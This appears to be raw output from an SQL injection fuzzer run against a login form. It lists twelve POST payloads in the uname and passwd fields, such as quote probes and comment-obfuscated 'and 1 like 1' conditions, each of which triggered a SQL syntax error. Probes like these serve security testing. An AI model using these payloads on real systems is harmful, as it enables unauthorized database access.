[+1+] SQL syntax  [1595] payload : [uname=123'&passwd=123&submit=Submit]
[+3+] SQL syntax  [1595] payload : [uname=123\&passwd=123&submit=Submit]
[+12+] SQL syntax  [1597] payload : [uname=123&passwd=123'&submit=Submit]
[+14+] SQL syntax  [1597] payload : [uname=123&passwd=123\&submit=Submit]
[+40+] SQL syntax  [1611] payload : [uname=123'/***/and/***/1/***/like/***/1  &passwd=123&submit=Submit]
[+46+] SQL syntax  [1643] payload : [uname=123')/***/and/***/1/***/like/***/1  &passwd=123&submit=Submit]
[+47+] SQL syntax  [1645] payload : [uname=123')/***/and/***/1/***/like/***/1 --+&passwd=123&submit=Submit]
[+48+] SQL syntax  [1643] payload : [uname=123')/***/and/***/1/***/like/***/1 %23&passwd=123&submit=Submit]
[+55+] SQL syntax  [1592] payload : [uname=123&passwd=123'/***/and/***/1/***/like/***/1  &submit=Submit]
[+61+] SQL syntax  [1624] payload : [uname=123&passwd=123')/***/and/***/1/***/like/***/1  &submit=Submit]
[+62+] SQL syntax  [1626] payload : [uname=123&passwd=123')/***/and/***/1/***/like/***/1 --+&submit=Submit]
[+63+] SQL syntax  [1624] payload : [uname=123&passwd=123')/***/and/***/1/***/like/***/1 %23&submit=Submit]
